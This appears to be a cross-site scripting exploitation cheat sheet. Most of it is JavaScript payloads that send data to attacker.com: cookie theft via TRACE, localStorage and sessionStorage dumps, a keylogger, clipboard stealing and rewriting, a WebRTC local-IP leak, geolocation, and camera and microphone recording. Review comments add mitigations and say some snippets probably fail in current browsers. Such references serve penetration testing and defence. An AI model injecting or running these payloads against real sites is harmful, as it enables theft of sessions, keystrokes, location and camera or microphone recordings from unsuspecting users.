
</> Cross Site Scripting (XSS)

📚 Resources

🛠️ Tools

  • BeEF - post-exploitation framework.

💥 Exploit

An XSS can lead to many malicious exploits, such as:

  • WebSocket reverse shell
  • Keylogger
  • Storage Stealing
  • Steal local file
  • Download evil binary
  • Mic / Cam Recorder
  • WebRTC => local IP
  • Geolocation
  • Crypto Miner
  • Internal Network Scanning

And much more.

Cross Trace Scripting

HttpOnly cookies aren't accessible via JavaScript, but they are still sent with every request. The TRACE method echoes the full request back, so a TRACE response can be used to exfiltrate the cookies.

js
// Issues a credentialed TRACE request to the current origin and forwards the
// response headers it receives to a third-party host.
// NOTE(review): getAllResponseHeaders() returns the *response* headers, not the
// response body where a TRACE echo usually lands, so whether cookies appear here
// depends on how the server formats its TRACE reply. Current browsers also
// treat TRACE as a forbidden method in XMLHttpRequest.open() (SecurityError).
// Mitigation: disable TRACE on the server; a CSP `connect-src` limits where
// script can send data.
var xhr = new XMLHttpRequest();
xhr.onload = function () {
  // Ships every response header to the remote host once the TRACE completes.
  fetch("//attacker.com", {
    method: "POST",
    body: xhr.getAllResponseHeaders(),
});
};
xhr.withCredentials = true; // cookies must ride along for the echo to contain them
xhr.open("TRACE", "/url", true); // \r\nTRACE might bypass some option filters
xhr.send();

Storage

js
// localStorage
// Serialises the origin's whole localStorage and POSTs it to a remote host.
// NOTE(review): anything kept in Web Storage is readable by any script running
// in the origin, so tokens stored here are lost to the first XSS. A CSP
// `connect-src` narrows where the data can go; not storing secrets there is the
// real fix.
fetch('//attacker.com/ls',{method:'POST',body:JSON.stringify(localStorage)})

// sessionStorage
// Same for sessionStorage, which is equally readable from script.
fetch('//attacker.com/ss',{method:'POST',body:JSON.stringify(sessionStorage)})

⌨️ Keylogger

js
// Buffers every key released on the page and POSTs the buffer as one string
// once it holds more than 20 entries, then clears it.
// NOTE(review): `k` is an implicit global and assigning `onkeyup` replaces any
// handler the page already installed. Detection: repeated POSTs to an origin
// not in the page's normal traffic; mitigation: CSP `connect-src` plus fixing
// the injection sink.
k=[];onkeyup=e=>{k.push(e.key);if(k.length>20){fetch('//attacker.com/key',{method:'POST',body:k.join('')});k=[]}}

Clipboard Hijacking

js
// Steal the content
// On each copy event, reads the current text selection and leaks it as a
// URL-encoded query parameter of a GET request to a remote host.
document.addEventListener('copy',()=>{
  let s=document.getSelection().toString();
  fetch('//attacker.com/copy?d='+encodeURIComponent(s))
})
js
// Rewrite the paste content
// Cancels the default paste and tries to replace the clipboard text.
// NOTE(review): per the Clipboard Events spec the DataTransfer exposed during a
// `paste` event is read-only, so setData() here is expected to be a no-op —
// confirm before treating this snippet as a working primitive.
document.addEventListener('paste',e=>{
  e.preventDefault();
  e.clipboardData.setData('text','https://evil.com/backdoor.exe');
})

🌐 WebRTC

js
// Creates a throwaway peer connection with no ICE servers so that candidate
// gathering only yields host candidates, then reports the first dotted-quad
// found in a candidate string to a remote host.
// NOTE(review): current browsers hide host candidates behind mDNS names
// (`<uuid>.local`) by default, so the regex commonly matches nothing and the
// `if(ip)` guard suppresses the request.
let pc=new RTCPeerConnection({iceServers:[]});
pc.createDataChannel(''); // a channel is needed for the offer to gather candidates
pc.createOffer().then(o=>pc.setLocalDescription(o));
pc.onicecandidate=e=>{
  if(e.candidate){
    // Non-global regex: exec() returns the first IPv4-looking match or null.
    let ip=/([0-9]{1,3}\.){3}[0-9]{1,3}/.exec(e.candidate.candidate);
    if(ip) fetch('//attacker.com/ip?local='+ip[0])
  }
}

🌍 Geolocation

js
// Requests the device position (the browser shows a permission prompt) and,
// on grant, leaks latitude/longitude as query parameters.
// No error callback is passed, so a denied prompt fails silently.
// Mitigation: `Permissions-Policy: geolocation=()` disables the API for the page.
navigator.geolocation.getCurrentPosition(p=>{
  fetch('//attacker.com/gps?lat='+p.coords.latitude+'&lon='+p.coords.longitude)
})

🔴 Record

js
// Cam Recording
// If a video input device is listed, requests camera access (permission
// prompt), attaches the stream to a <video> appended to the body, and every
// 5 s draws the current frame to a canvas and POSTs it as a Blob.
// NOTE(review): the <video> is appended unstyled, so it is visible on the page,
// and browsers typically show a recording indicator while the stream is live.
// Mitigation: `Permissions-Policy: camera=()`.
var v=document.createElement('video');
navigator.mediaDevices.enumerateDevices().then(d=>{
  // Inner `d` shadows the device list; here it is a single device entry.
  if(d.find(d=>d.kind=='videoinput')){
    navigator.mediaDevices.getUserMedia({video:true}).then(stream=>{
      document.body.appendChild(v);
      v.srcObject=stream;v.play();
      setInterval(()=>{
        let c=document.createElement('canvas');
        c.width=v.videoWidth;c.height=v.videoHeight;
        c.getContext('2d').drawImage(v,0,0);
        c.toBlob(b=>fetch('//attacker.com/stream',{method:'POST',body:b}));
      },5000)
    })
  }
})
js
// Mic Recording
// Requests microphone access (permission prompt) and POSTs each MediaRecorder
// chunk, emitted every 3000 ms, to a remote host.
// No .catch is attached, so a denied prompt surfaces as an unhandled rejection.
// Mitigation: `Permissions-Policy: microphone=()`.
navigator.mediaDevices.getUserMedia({audio:true}).then(s=>{
  let r=new MediaRecorder(s);
  r.ondataavailable=e=>fetch('//attacker.com/audio_chunk',{method:'POST',body:e.data});
  r.start(3000)
})